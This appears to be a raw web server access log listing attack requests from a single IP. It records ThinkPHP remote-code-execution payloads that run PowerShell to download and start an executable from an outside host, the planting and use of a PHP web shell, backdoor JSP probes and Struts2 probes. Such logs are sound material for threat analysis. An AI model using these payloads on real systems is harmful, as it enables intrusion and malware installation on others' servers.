| timestamp | ip | host | browser | uri |
|---|
| 20181220-02:48:55 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) | /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/14.exe');start%20C:/14.exe |
| 20181220-02:48:55 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) | /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php |
| 20181220-02:48:55 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) | /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/14.exe');start%20C:/14.exe |
| 20181220-05:11:06 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) | /public/index.php?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/14.exe');start%20C:/14.exe |
| 20181220-05:11:06 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) | /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=echo%20%5E%3C?php%20$action%20=%20$_GET%5B'xcmd'%5D;system($action);?%5E%3E%3Ehydra.php |
| 20181220-05:11:06 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) | /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/14.exe');start%20C:/14.exe |
| 20181220-14:21:30 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) | /FxCodeShell.jsp?wiew=FxxkMyLie1836710Aa&os=1&address=http://a46.bulehero.in/download.exe |
| 20190309-23:14:10 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid.hognoob.se/download.exe |
| 20190311-09:38:08 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/struts2-rest-showcase/orders.xhtml |
| 20190311-09:38:08 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/index.action |
| 20190311-09:38:08 | 54.89.62.192 | ec2-54-89-62-192.compute-1.amazonaws.com | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) | http://54.89.6.87:80/index.do |